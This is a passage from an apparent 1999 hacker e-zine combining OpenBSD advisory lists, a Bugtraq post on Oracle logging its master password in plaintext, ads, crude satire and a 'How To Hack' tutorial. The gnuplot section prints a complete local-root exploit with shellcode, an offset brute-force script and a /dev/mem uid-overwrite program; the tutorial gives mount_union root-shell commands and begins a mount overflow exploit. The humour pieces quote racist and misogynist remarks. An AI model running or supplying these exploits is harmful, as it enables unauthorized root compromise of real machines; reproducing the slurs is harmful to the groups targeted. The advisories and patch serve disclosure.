  5623.             Nov 27, 1998: There is a remotely exploitable problem in bootpd(8). (patch included). 
  5624.             Nov 19, 1998: There is a possibly locally exploitable problem relating to environment variables in termcap and curses. (patch included). 
  5625.             Nov 13, 1998: There is a remote machine lockup bug in the TCP decoding kernel. (patch included). 
  5626.        
  5627.        OpenBSD 2.3 Security Advisories
  5628.        
  5629.        These are the OpenBSD 2.3 advisories -- all these problems are solved in OpenBSD current. Obviously, all the OpenBSD 2.2 advisories listed below are fixed in
  5630.        OpenBSD 2.3. 
  5631.        
  5632.             Nov 27, 1998: There is a remotely exploitable problem in bootpd(8). (patch included). 
  5633.             Nov 13, 1998: There is a remote machine lockup bug in the TCP decoding kernel. (patch included). 
  5634.             Jul 2, 1998: setuid and setgid processes should not be executed with fd slots 0, 1, or 2 free. (patch included). 
  5635.             August 31, 1998: A benign looking resolver buffer overflow bug was re-introduced accidentally (patches included). 
  5636.             June 6, 1998: Further problems with the X libraries (patches included). 
  5637.             June 4, 1998: on non-Intel i386 machines, any user can use pctr(4) to crash the machine. 
  5638.             May 17, 1998: kill(2) of setuid/setgid target processes too permissive (4th revision patch included). 
  5639.             May 11, 1998: mmap() permits partial bypassing of immutable and append-only file flags. (patch included). 
  5640.             May 1, 1998: Buffer overflow in xterm and Xaw (CERT advisory VB-98.04) (patch included). 
  5641.             May 5, 1998: Incorrect handling of IPSEC packets if IPSEC is enabled (patch included). 
  5642.        
  5643.        OpenBSD 2.2 Security Advisories
  5644.        
  5645.        These are the OpenBSD 2.2 advisories. All these problems are solved in OpenBSD 2.3. Some of these problems still exist in other operating systems. (The supplied
  5646.        patches are for OpenBSD 2.2; they may or may not work on OpenBSD 2.1). 
  5647.        
  5648.             May 5, 1998: Incorrect handling of IPSEC packets if IPSEC is enabled (patch included). 
  5649.             May 1, 1998: Buffer overflow in xterm and Xaw (CERT advisory VB-98.04) (patch included). 
  5650.             Apr 22, 1998: Buffer overflow in uucpd (patch included). 
  5651.             Apr 22, 1998: Buffer mismanagement in lprm (patch included). 
  5652.             Mar 31, 1998: Overflow in ping -R (patch included). 
  5653.             Mar 30, 1998: Overflow in named fake-iquery (patch included). 
  5654.             Mar 2, 1998: Accidental NFS filesystem export (patch included). 
  5655.             Feb 26, 1998: Read-write mmap() flaw. Revision 3 of the patch is available here 
  5656.             Feb 19, 1998: Sourcerouted Packet Acceptance. A patch is available here. 
  5657.             Feb 13, 1998: Setuid coredump & Ruserok() flaw (patch included). 
  5658.             Feb 9, 1998: MIPS ld.so flaw (patch included). 
  5659.             Dec 10, 1997: Intel P5 f00f lockup (patch included). 
  5660.        
  5661.        OpenBSD 2.1 Security Advisories
  5662.        
  5663.        These are the OpenBSD 2.1 advisories. All these problems are solved in OpenBSD 2.2. Some of these problems still exist in other operating systems. (If you are
  5664.        running OpenBSD 2.1, we would strongly recommend an upgrade to the newest release, as this patch list only attempts at fixing the most important security
  5665.        problems. In particular, OpenBSD 2.2 fixes numerous localhost security problems. Many of those problems were solved in ways which make it hard for us to
  5666.        provide patches). 
  5667.        
  5668.             Sep 15, 1997: Deviant Signals (patch included) 
  5669.             Aug 2, 1997: Rfork() system call flaw (patch included) 
  5670.             Jun 24, 1997: Procfs flaws (patch included) 
  5671.        
  5672.        Watching our Security Changes
  5673.        
  5674.        Since we take a proactive stance with security, we are continually finding and fixing new security problems. Not all of these problems get widely reported because
  5675.        (as stated earlier) many of them are not confirmed to be exploitable; many simple bugs we fix do turn out to have security consequences we could not predict. We
  5676.        do not have the time resources to make these changes available in the above format.
  5677.        
  5678.        Thus there are usually minor security fixes in the current source code beyond the previous major OpenBSD release. We make a limited guarantee that these
  5679.        problems are of minimal impact and unproven exploitability. If we discover that a problem definitely matters for security, patches will show up here VERY quickly.
  5680.               
  5681.        @HWA
  5682.        
  5683.  34.0  Oracle is insecure at initial installation
  5684.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5685.        
  5686.        Approved-By: aleph1@UNDERGROUND.ORG 
  5687.        Received: from majestic.tcs.tulane.edu (majestic.tcs.tulane.edu [129.81.224.6]) 
  5688.                  by netspace.org (8.8.7/8.8.7) with ESMTP id QAA32299 for 
  5689.                  <BUGTRAQ@netspace.org>; Thu, 4 Mar 1999 16:37:24 -0500 
  5690.        Received: from xftpd (h107.s156.tulane.edu [129.81.156.107]) by 
  5691.                  majestic.tcs.tulane.edu (8.9.3/8.9.3) with SMTP id PAA09523 for 
  5692.                  <BUGTRAQ@netspace.org>; Thu, 4 Mar 1999 15:36:58 -0600 (CST) 
  5693.        MIME-Version: 1.0 
  5694.        Content-Type: text/plain; charset="iso-8859-1" 
  5695.        Content-Transfer-Encoding: 7bit 
  5696.        X-Priority: 3 (Normal) 
  5697.        X-MSMail-Priority: Normal 
  5698.        X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 
  5699.        X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 
  5700.        Importance: Normal 
  5701.        Message-ID: <000201be6688$33466770$6b9c5181@xftpd.tulane.edu> 
  5702.        Date:   Thu, 4 Mar 1999 15:44:37 -0600 
  5703.        Reply-To: James Kivisild <kivisild@MAILHOST.TCS.TULANE.EDU> 
  5704.        Sender: Bugtraq List <BUGTRAQ@netspace.org> 
  5705.        From: James Kivisild <kivisild@MAILHOST.TCS.TULANE.EDU> 
  5706.        Subject:      Oracle Plaintext Password 
  5707.        To: BUGTRAQ@netspace.org 
  5708.        
  5709.        
  5710.            I now know this has been mentioned before, however I've gotten a large
  5711.        number of responses from people about Oracle problems similar to this. As a
  5712.        first time Oracle installer, I didn't realize the scope of the problem. I
  5713.        hope that upon reading this, more people will realize that the Default
  5714.        settings under Oracle just aren't secure.
  5715.        
  5716.        
  5717.        Original Post to NTBugtraq:
  5718.        
  5719.        
  5720.            I apologize if this has been mentioned before, however I haven't had any
  5721.        time to pursue this issue with any vigor.
  5722.        
  5723.        
  5724.            I recently installed Oracle 8.0.3 Enterprise Edition on an NT 4.0
  5725.        Workstation and I noticed a particular feature within Oracle Database
  5726.        Assistant v1.0 that might be of some interest/concern.
  5727.        
  5728.        
  5729.            During the creation of an Oracle database, the Database Assistant lets you
  5730.        create either a custom or typical(default) database. If you select "custom"
  5731.        database, you must enter a master password that controls the administrative
  5732.        features in the database. If you select "typical", this password defaults to
  5733.        'oracle'.
  5734.        
  5735.        
  5736.            As the database is created, the Server Manager reports all activities to a
  5737.        log file. This log file, "\orant\database\spoolmain.log", even logs the
  5738.        master password as it connects to the server to continue the setup. The
  5739.        entry is as follows:
  5740.        
  5741.        
  5742.        Echo                            ON
  5743.        SVRMGR> connect INTERNAL/MYPASSWORD
  5744.        Connected.
  5745.        
  5746.        
  5747.            Not only is this password in plaintext, but the file has permissions that
  5748.        enable anyone to view it. (owned by Admins, but full control for everyone)
  5749.        I believe the setup informs you that the file exists and should be checked
  5750.        for errors, but I didn't find any other reference to it in the
  5751.        documentation.
  5752.        
  5753.        
  5754.            The log does get overwritten each time you create a new database, however
  5755.        that just limits the number of plaintext passwords to one. Once again, I
  5756.        haven't had time to look into this, but it seems like a potential problem
  5757.        worth mentioning.
  5758.        
  5759.        
  5760.        
  5761.        -James Kivisild
  5762.  
  5763.        @HWA
  5764.        
  5765.        
  5766.  35.0  GnuPlot buffer overflow exploit
  5767.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5768.        
  5769.        Approved-By: aleph1@UNDERGROUND.ORG 
  5770.        Received: from inferno.tusculum.edu (qmailr@inferno.tusculum.edu 
  5771.                  [206.228.254.202]) by netspace.org (8.8.7/8.8.7) with SMTP id 
  5772.                  QAA02678 for <bugtraq@netspace.org>; Thu, 4 Mar 1999 16:55:02 -0500 
  5773.        Received: (qmail 484 invoked by uid 1111); 4 Mar 1999 21:55:18 -0000 
  5774.        Message-ID: <19990304215518.483.qmail@inferno.tusculum.edu> 
  5775.        Date:   Thu, 4 Mar 1999 21:55:18 -0000 
  5776.        Reply-To: xnec@INFERNO.TUSCULUM.EDU 
  5777.        Sender: Bugtraq List <BUGTRAQ@netspace.org> 
  5778.        From: xnec@INFERNO.TUSCULUM.EDU 
  5779.        Subject:      Linux /usr/bin/gnuplot overflow 
  5780.        To: BUGTRAQ@netspace.org 
  5781.        
  5782.        
  5783.        greetings,
  5784.        
  5785.        
  5786.        INFO:
  5787.        
  5788.        
  5789.        There is a local root comprimise in /usr/bin/gnuplot version Linux version 3.5
  5790.        (pre 3.6) patchlevel beta 336.  gnuplot is shipped to install suidroot on
  5791.        SuSE 5.2 and maybe others.  The exploit starts as a simple $HOME buffer
  5792.        overflow, but much like zgv holes in the past, it drops root privs before the
  5793.        overflow occurs.  However, as Nergal describes at
  5794.        http://www.geek-girl.com/bugtraq/1998_4/0148.html, svgalib needs write access
  5795.        to /dev/mem, and we can therefore regain root privs by overwriting our uid.
  5796.        
  5797.        
  5798.        the offending code appears in plot.c where we see:
  5799.        
  5800.        
  5801.            char home[80];
  5802.        ...
  5803.            char *tmp_home=getenv(HOME);
  5804.        ...
  5805.            strcpy(home,tmp_home);
  5806.        
  5807.        
  5808.        EXPLOIT:
  5809.        
  5810.        
  5811.        xnec_plot.c
  5812.        ---snip---
  5813.        /*
  5814.        gnuplot Linux x86 exploit from xnec
  5815.        tested on gnuplot Linux version 3.5 (pre 3.6) patchlevel beta 336/SuSE 5.2
  5816.        gnuplot ships suidroot by default in SuSE 5.2, maybe others
  5817.        
  5818.        
  5819.        gcc -o xnec_plot xnec_plot.c
  5820.        ./xnec_plot <bufsiz> <offset>
  5821.        
  5822.        
  5823.        The buffer we're overflowing is only 80 bytes, so we're going to have to
  5824.        get our settings just so.  If you don't feel like typing in command line
  5825.        offsets and bufsizes, make a little shell script:
  5826.        ---
  5827.        #! /bin/bash
  5828.        bufsiz=110
  5829.        offset=0
  5830.        
  5831.        
  5832.        while [ $offset -lt 500 ]; do
  5833.          ./xnec_plot $bufsiz $offset
  5834.          offset=`expr $offset + 10`
  5835.        done
  5836.        ---
  5837.        since gnuplot drops root privs after it inits your svga, we can't just exec
  5838.        /bin/sh, we'll need to use the technique of replacing our saved uid
  5839.        in /dev/mem with '0', then execing whatever we please.  We do this by compiling
  5840.        Nergal's program, mem.c and putting the output file in /tmp/xp, as in
  5841.        gcc -o /tmp/xp mem.c.  Nergal's program will then make /tmp/sh suidroot,
  5842.        so don't forget to cp /bin/sh /tmp/sh.  You will also have to change
  5843.        line 32 to the correct address of kstat, which can be obtained by doing
  5844.        strings /proc/ksyms | grep kstat.
  5845.        
  5846.        
  5847.        Since I can see absolutely no reason for gnuplot to be suidroot, the best
  5848.        fix is chmod -s /usr/bin/gnuplot.
  5849.        
  5850.        
  5851.        greets to #sk1llz, xnec on EFnet and DALnet
  5852.        
  5853.        
  5854.        */
  5855.        
  5856.        
  5857.        #include <stdlib.h>
  5858.        
  5859.        
  5860.        #define DEFAULT_OFFSET 50
  5861.        #define DEFAULT_BUFSIZ 110
  5862.        #define NOP 0x90
  5863.        #define DEFAULT_ADDR 0xbffff81c
  5864.        
  5865.        
  5866.        /* Aleph One's shellcode, modified to run our own program */
  5867.        char shellcode[] =
  5868.          "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  5869.          "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  5870.          "\x80\xe8\xdc\xff\xff\xff/tmp/xp";
  5871.        
  5872.        
  5873.        unsigned long getsp(void) {
  5874.           __asm__("movl %esp,%eax");
  5875.        }
  5876.        
  5877.        
  5878.        
  5879.        void main(int argc, char *argv[]) {
  5880.          char *buf, *ret;
  5881.          long *addrp, addr;
  5882.          int bufsiz, offset;
  5883.          int i;
  5884.        
  5885.        
  5886.          bufsiz=DEFAULT_BUFSIZ;
  5887.          offset=DEFAULT_OFFSET;
  5888.        
  5889.        
  5890.          if (argc = 2) bufsiz  = atoi(argv[1]);
  5891.          if (argc = 3) offset = atoi(argv[2]);
  5892.        
  5893.        
  5894.          buf=malloc(bufsiz);
  5895.          addr = getsp() - offset;
  5896.        
  5897.        
  5898.          printf("address: 0x%x\n", addr);
  5899.          printf("bufsize: %d\n", bufsiz);
  5900.          printf("offset : %d\n", offset);
  5901.        
  5902.        
  5903.          ret = buf;
  5904.          addrp = (long *) ret;
  5905.          for (i = 0; i < bufsiz; i+=4)
  5906.            *(addrp++) = addr;
  5907.        
  5908.        
  5909.          memset(buf, NOP, (strlen(shellcode)/2));
  5910.        
  5911.        
  5912.          ret = buf + ((bufsiz/2) - (strlen(shellcode)/2));
  5913.          for (i = 0; i < strlen(shellcode); i++)
  5914.            *(ret++) = shellcode[i];
  5915.        
  5916.        
  5917.          buf[bufsiz - 1] = '\0';
  5918.        
  5919.        
  5920.          memcpy(buf,"HOME=", 5);
  5921.          setenv("HOME", buf, 1);
  5922.          execvp("/usr/bin/gnuplot", NULL);
  5923.        }
  5924.        ---snip---
  5925.        
  5926.        
  5927.        mem.c
  5928.        ---snip---
  5929.        /* by Nergal */
  5930.        #define SEEK_SET 0
  5931.        
  5932.        
  5933.        #define __KERNEL__
  5934.        #include <linux/sched.h>
  5935.        #undef __KERNEL__
  5936.        
  5937.        
  5938.        #define SIZEOF sizeof(struct task_struct)
  5939.        
  5940.        
  5941.        int mem_fd;
  5942.        int mypid;
  5943.        
  5944.        
  5945.        void
  5946.        testtask (unsigned int mem_offset)
  5947.        {
  5948.          struct task_struct some_task;
  5949.          int uid, pid;
  5950.          lseek (mem_fd, mem_offset, SEEK_SET);
  5951.          read (mem_fd, &some_task, SIZEOF);
  5952.          if (some_task.pid == mypid)   /* is it our task_struct ? */
  5953.            {
  5954.              some_task.euid = 0;
  5955.              some_task.fsuid = 0;      /* needed for chown */
  5956.              lseek (mem_fd, mem_offset, SEEK_SET);
  5957.              write (mem_fd, &some_task, SIZEOF);
  5958.              /* from now on, there is no law beyond do what thou wilt */
  5959.              chown ("/tmp/sh", 0, 0);
  5960.              chmod ("/tmp/sh", 04755);
  5961.              exit (0);
  5962.            }
  5963.        }
  5964.        #define KSTAT 0x001a8fb8  /*  <-- replace this addr with that of your kstat */
  5965.        main ()                   /*      by doing strings /proc/ksyms |grep kstat  */
  5966.        {
  5967.          unsigned int i;
  5968.          struct task_struct *task[NR_TASKS];
  5969.          unsigned int task_addr = KSTAT - NR_TASKS * 4;
  5970.          mem_fd = 3;                   /* presumed to be opened /dev/mem */
  5971.          mypid = getpid ();
  5972.          lseek (mem_fd, task_addr, SEEK_SET);
  5973.          read (mem_fd, task, NR_TASKS * 4);
  5974.          for (i = 0; i < NR_TASKS; i++)
  5975.            if (task[i])
  5976.              testtask ((unsigned int)(task[i]));
  5977.        
  5978.        
  5979.        }
  5980.        ---snip---
  5981.        
  5982.        
  5983.        FIX:
  5984.        
  5985.        
  5986.        Since I see absolutely no good reason why gnuplot should be suidroot (who,
  5987.        besides root, is going to run it, anyway?), I would recommend a simple
  5988.        chmod -s /usr/bin/gnuplot.  If you absolutely insist on suid, here's the patch:
  5989.        
  5990.        
  5991.        --- plot.c.old  Fri Mar  5 03:17:59 1999
  5992.        +++ plot.c      Fri Mar  5 03:29:19 1999
  5993.        @@ -516,7 +516,7 @@
  5994.             char c='\0';/* character that should be added, or \0, if none */
  5995.        
  5996.        
  5997.             if(tmp_home) {
  5998.        -       strcpy(home,tmp_home);
  5999.        +       strncpy(home,tmp_home,(sizeof(home) - 1));
  6000.                if( strlen(home) ) p = &home[strlen(home)-1];
  6001.                else               p = home;
  6002.        #if defined(MSDOS) || defined(ATARI) || defined( OS2 ) || defined(_Windows) ||
  6003.        defined(DOS386)
  6004.        
  6005.        
  6006.        However, this by no means was a comprehensive security audit of gnuplot, so
  6007.        there may very well be a dozen other problems I've not fixed.
  6008.        
  6009.        
  6010.                                     -xnec
  6011.        
  6012.        
  6013.        
  6014.        ##################################################################
  6015.        #     xnec@inferno.tusculum.edu  -  xnec on IRC EF and DALnet    #
  6016.        ##################################################################
  6017.  
  6018.        @HWA
  6019.        
  6020.  AD.S  ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
  6021.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6022.  
  6023.        $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
  6024.        !                                                                            !       
  6025.        $                                                                            $       
  6026.        !     *** IT HAS BEEN FOUR YEARS! ***    FREE KEVIN MITNICK NOW!!!! **       !
  6027.        $                                                                            $              
  6028.        !                                                                            !
  6029.        $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$
  6030.  
  6031.        www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
  6032.        n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
  6033.        m www.2600.com ########################################ww.2600.com www.freeke
  6034.        vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
  6035.        com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
  6036.        kevin.com www.k#             FREE KEVIN!              #in.com www.kevinmitnic
  6037.        k.com www.2600.########################################om www.2600.com www.fre
  6038.        ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
  6039.        k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
  6040.  
  6041.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  6042.        * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
  6043.        *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
  6044.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  6045.  
  6046.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  6047.        * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
  6048.        * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
  6049.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  6050.  
  6051.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  6052.        * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
  6053.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  6054.  
  6055.  
  6056.          //////////////////////////////////////////////////////////////////////////////
  6057.         //  To place an ad in this section simply type it up and email it to        //
  6058.        //        hwa@press,usmc.net, put AD! in the subject header please. - Ed    //
  6059.       //////////////////////////////////////////////////////////////////////////////
  6060.  
  6061.  
  6062.      @HWA
  6063.  
  6064.  HA.HA Humour and puzzles ...etc
  6065.        ~~~~~~~~~~~~~~~~~~~~~~~~~
  6066.        
  6067.        It isn't by mere chance that "anal" is part of the word "analyst"
  6068.                                 
  6069.                                       - Anonymous (Ex?)Analyst
  6070.                                       
  6071.               
  6072.        "Its like my yo-yo, what made it special made it dangerous, so
  6073.              I buried it ..." 
  6074.                                       - Kate Bush (Cloudbusting)
  6075.        
  6076.        Seen on Doonesbury (as reported by HNN and Innerpulse.com) script
  6077.        included below for completeness .... <:-p
  6078.        
  6079.        Dad - "I Can't understand how anyone could break into our server
  6080.               we just installed a new firewall!"
  6081.              
  6082.        Girl - "Its easy Pop, anybody can hack these days, even newbies can 
  6083.               just pull kiddie scripts <sic> off the web and put an exploit
  6084.               into play within seconds
  6085.               Theres just no degree of difficulty anymore, half my computer 
  6086.               class has hacked into the Strategic Air Command."
  6087.               
  6088.        Dad -  "They WHAT!"
  6089.        
  6090.        Girl - "To collect old launch codes. Its no big deal."
  6091.        
  6092.        I still don't think Doonesbury is, was or ever will be, funny but to each
  6093.        their own... - Ed
  6094.  
  6095.        
  6096.        More humour from www.innerpulse.com;
  6097.        
  6098.        
  6099.        SNET Consumer Tip Hotline 
  6100.        Contributed by siko
  6101.        Tuesday - March 23, 1999. 05:36PM GMT 
  6102.  
  6103.        SNET Consumer Tip Hotline helps people with their everyday struggles.
  6104.        Innerpulse President, siko, provides the inf0z for the heads up in the scene.
  6105.  
  6106.           1-800-999-8477
  6107.                     2351 Portable Computers.
  6108.                     2352 Avoiding Viruses.
  6109.                     2354 It's Broken!
  6110.  
  6111.       Innerpulse recommends 2352, Avoiding Viruses. It gives keen insight into the
  6112.       dark world of computer viruses created by shady criminals on the fringe of the
  6113.       web. 
  6114.  
  6115.  
  6116.       AntiOnline Saga Continues 
  6117.       Contributed by siko
  6118.       Tuesday - March 23, 1999. 04:33AM GMT 
  6119.  
  6120.           Late last night, an expert panel of Innerpulse analysts reading through the
  6121.       new AntiOnline mail bag were able to make several key insights as to the
  6122.       organization and operation of AntiOnline. 
  6123.  
  6124.       Dan Martin, who was obviously leaked some inside information from
  6125.       someone high up in the AntiOnline heirarchy, let the world know about the
  6126.       disasters over at AntiOnline. Not only is the lobby messy, but AntiOnline gets
  6127.       their news from what market experts are calling.. Innerpulse.com.
  6128.  
  6129.       "I used the investment money to support my cocaine habit", boasted JP just
  6130.       before he blasted Mexicans for being what he thinks as inferior to himself.
  6131.       Other sections of the Mail Bag included racist remarks aimed at Brazilians,
  6132.       Chinese, and Arabs (we can only assume he was knocking Arabs with the
  6133.       bombing cracks). 
  6134.  
  6135.       "This is an outrage. How could he tear up so many different different people.
  6136.       And worst of all he forgot to tear up the Japanese.", said a respected member
  6137.       of the Internet community.
  6138.  
  6139.       Also, Innerpulse CEO, Marvin Speling, has decided to contact the resident
  6140.       Innerpulse Legal staff since it seems AntiOnline is what is legally termed as
  6141.       "Crampin my style".
  6142.  
  6143.       Innerpulse likes people of all race, creed, color, sex, age, and origin.
  6144.       Undernet patrons excluded.
  6145.  
  6146.  
  6147.  
  6148.  
  6149.        New Study Results: Only Idle on IRC 
  6150.        Contributed by siko
  6151.        Sunday - March 21, 1999. 09:12PM GMT 
  6152.  
  6153.         Innerpulse.com spent time on Efnet and Undernet and picked up a thing or
  6154.        two. Innerpulse has now learned that just because someone is idle for a week
  6155.        on IRC doesn't mean your news page should idle for a week, as Innerpulse
  6156.        Media Ltd. has concluded in a comprehensive study early this morning.
  6157.  
  6158.        "Sometimes I idle on IRC for 2, 3 days at a time. The idea of idling elsewhere
  6159.        on the Internet is new... ", commented an unknown Undernet IRC patron.
  6160.        "But I guess it could be kind of elite..".
  6161.  
  6162.        Among other areas explored by the small panel of hackers who tested internet
  6163.        waters for over a week as a supplement to Gateway's study included IRC
  6164.        relationships and an inside look at why hackers hack.
  6165.  
  6166.        Innerpulse head janitor, Bobo Jensen, commented on his IRC relationship and
  6167.        how it all fit in with his wildly successful life. Innerpulse Analyst, Mark
  6168.        Winters, speculated on the future of online relationships: "We all know bitches
  6169.        aint shit. What do you want me to say?" 
  6170.  
  6171.  
  6172.        AOL's security compromised 
  6173.        Contributed by blanco
  6174.        Sunday - March 21, 1999. 08:01PM UTC 
  6175.  
  6176.             An 18-year-old high school dropout has been charged with computer
  6177.        tampering after hacking into the internal computers of America Online and
  6178.        altering some programs. The super k-rad hacker apparently exploited AOL's
  6179.        main server by "Punting" it, which apparently it's servers cannot handle. 
  6180.  
  6181.        This AOL hacker did not return phone calls when Innerpulse contacted him
  6182.        for further information. 
  6183.  
  6184.        AOL security expert Mark Winters made these comments, " It appears
  6185.        after we upgraded all of our servers to Windows98 last week that we
  6186.        didn't patch it to AOL standard. Fixing a punt attack like this one will
  6187.        cost us about $50,000. In reality that isn't too much, since we charge our
  6188.        customers $20.00 per m onth when they can barely use our service due
  6189.        to busy signals." USA today 
  6190.        
  6191.  
  6192.        Flood Net has Local IRC'er's 'Shitting Bricks' 
  6193.        Contributed by siko
  6194.        Tuesday - March 09, 1999. 09:17PM GMT 
  6195.  
  6196.            It was a calm, placid seeming Tuesday afternoon on the Internet. Thats
  6197.        when what one channel member is calling 'an outbreak from hell' occured. 
  6198.  
  6199.        "I looked away to see what was on TV, and next thing I know, they were
  6200.        filling our channel up. There were at least 20 of them", said one channel
  6201.        member. The hacker and his channel wish to remain nameless. "Next thing I
  6202.        know they were sending a msg to the channel saying 'owned!!!!!@@#$' all at
  6203.        the same time. It's a really creative idea, when you think about it.".
  6204.  
  6205.        What is known to expert IRC operators as a 'Flood Net', was at work
  6206.        flooding the hacker channel. Innerpulse IRC expert Mark Winters was
  6207.        contacted to help take some of the myth out of Flood Nets, to help the reader
  6208.        understand just how vicious these attacks can be.
  6209.  
  6210.        "Well, one of my fondest experiences was when I was talking to my bitch
  6211.        online, and all of a sudden a bunch of fuckers with the same nick with a
  6212.        different number appended to the end joined the channel and starting flooding.
  6213.        I had to do something quick.", says Winters, who has several other such
  6214.        experiences. "It wasn't for about.. say 3 months til I found a patch. It is to
  6215.        type '/msg '. This eliminates the possibility of outside interference.".
  6216.  
  6217.        The FloodNet that rocked this small Efnet IRC community earlier Tuesday
  6218.        afternoon has left. Analysts speculate that everything will be back to normal
  6219.        when the shock wears off. 
  6220.        
  6221.        
  6222.        
  6223.        
  6224.        
  6225.        @HWA
  6226.        
  6227.  
  6228.  HOW.TO "How To Hack" March 1999 -> Part 2 (Step 5)
  6229.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6230.                
  6231.          
  6232.         Intro from previous issue
  6233.         ~~~~~~~~~~~~~~~~~~~~~~~~~
  6234.          
  6235.          This is not coincidentally next to the HA.HA section in the 
  6236.         HWA.hax0r.news zine in fact the name itself is a piss-take on the
  6237.         "scene" (if you can't take the piss out of yourself you're taking
  6238.         things way to seriously and won't survive 2 weeks out here) but its
  6239.         a fact that anyone that puts out a zine like this has to  deal with
  6240.         and thats the endless messages and questions from 'newbies' asking
  6241.         "HOW DO I HACK xxxx OS?" etc, well here's how you do it. I'll warn 
  6242.         you up front that i'm not going to be gentle and will be fucking
  6243.         blunt with you, if you don't have the balls fuck off now you're dead 
  6244.         meat and will be minced and made a laughing stock all over the net, 
  6245.         if you think you can handle it then read on, this is an excersize
  6246.         that is best learned by doing but do it on your own machine if you
  6247.         try any of these things on someone elses box without any experience
  6248.         you will end up in jail.
  6249.         
  6250.         Step 5.
  6251.         ~~~~~~~
  6252.         Breaking in. 
  6253.         
  6254.         Actually this consists of scanning for weaknesses first before any
  6255.         real attempts are made at gaining entry. An adept admin or a savvy
  6256.         network operations centre (NOC) will have scanner alarms set up to
  6257.         identify possible threatening probes so this is another reason why
  6258.         u want to do this on a home machine, the purpose after all is to
  6259.         learn how to secure your own site by breaking into it as Dan Farmer
  6260.         pointed out in his paper, you have read that right? no? then read
  6261.         it now then continue here.
  6262.         
  6263.         Common insecurities
  6264.         ~~~~~~~~~~~~~~~~~~~
  6265.         
  6266.         There are almost as many ways to compromise a system as there are
  6267.         programs that are available to run from shell. Almost every program
  6268.         ever written has some sort of weakness or fallibility the most 
  6269.         common being the buffer overflow (read Smashing The Stack by Mudge)
  6270.         this works by "popping the stack" with alien code using a benign
  6271.         program such as sendmail to insert the code. Using sendmail has its
  6272.         obvious merits because it can be accessed from outside the system
  6273.         other entry points are rlogin, telnet, ftp, qpopper, among several
  6274.         others, your scanner will have identified open ports, some may 
  6275.         surprise you, its amazing what people have running and often do not
  6276.         even realize for instance backdoors left over from previous attacks
  6277.         where the attacker is long gone and moved on to other systems.
  6278.         
  6279.         Back to our own system, i'll use BSD in this example, using and old
  6280.         copy of FreeBSD it was possible to gain root using a simple script
  6281.         and the mount union command, by using vi or simply echo data >> script
  6282.         it was possible (if you had a user account) to gain root priveledges
  6283.         in a matter of seconds regardless of your group or access level.
  6284.         
  6285.         <snip>
  6286.         
  6287.         to get a root shell as an unpriveledged user use:
  6288.         
  6289.         mkdir a
  6290.         mkdir b
  6291.         mount_union ~/a ~/b
  6292.         mount_union -b ~/a ~/b
  6293.  
  6294.         to get euid try this:
  6295.  
  6296.         export PATH=/tmp:$PATH
  6297.         echo /bin/sh >/tmp/modload
  6298.         chmod +x /tmp/modload
  6299.         mount_union /dir1 /dir2
  6300.         
  6301.                
  6302.         <snip>
  6303.         
  6304.         This worked on BSD up to version 2.0 STABLE
  6305.         
  6306.         And here is an example of a mount exploit using the buffer overflow 
  6307.         method;
  6308.         
  6309.         <snip>
  6310.         
  6311.         /* Mount Exploit for Linux/FreeBSD, Jul 30 1996 
  6312.        
  6313.        ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  6314.        ::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
  6315.        :::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
  6316.        ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
  6317.        ::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
  6318.        ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
  6319.        ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
